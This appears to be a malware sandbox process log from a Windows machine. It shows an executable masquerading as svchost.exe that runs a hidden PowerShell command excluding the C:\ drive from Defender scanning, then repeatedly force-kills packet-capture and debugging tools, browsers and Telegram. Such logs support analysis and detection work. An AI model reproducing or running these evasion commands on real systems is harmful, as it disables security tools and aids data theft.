"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc6b37ab58,0x7ffc6b37ab68,0x7ffc6b37ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3064 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3092 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4336 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4480 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4572 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4764 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4560 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:1
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
C:\ProgramData\Windows Runtime.exe
"C:\ProgramData\Windows Runtime.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\jdmlfb.exe
"C:\Users\Admin\AppData\Local\Temp\jdmlfb.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_4752_133629163400391547\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\jdmlfb.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Users\Admin\AppData\Local\Temp\onefile_4752_133629163400391547\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\onefile_4752_133629163400391547\svchost.exe" "--multiprocessing-fork" "parent_pid=4008" "pipe_handle=468"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath \"C:\\\""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
